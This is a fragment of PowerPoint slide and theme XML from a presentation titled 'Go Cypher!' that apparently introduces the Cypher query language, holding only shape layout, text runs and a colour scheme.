          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3232" name="Google Shape;3232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7" name="Google Shape;3237;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1453675" y="1170125"/>
            <a:ext cx="6363900" cy="242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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88200" y="1049475"/>
            <a:ext cx="89676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7200"/>
              <a:t>Go Cypher!</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3239" name="Google Shape;3239;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2402900"/>
            <a:ext cx="9144000" cy="19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4300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Understanding </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400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Cypher Query</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400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5" name="Google Shape;32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6" name="Google Shape;324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ater Thesis by Slidesgo">
  <a:themeElements>
    <a:clrScheme name="Simple Light">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="35B1D6"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="51BFDF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="35B1D6"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="3BAECF"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="70CBE6"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="78D7F1"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4298B8"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="26647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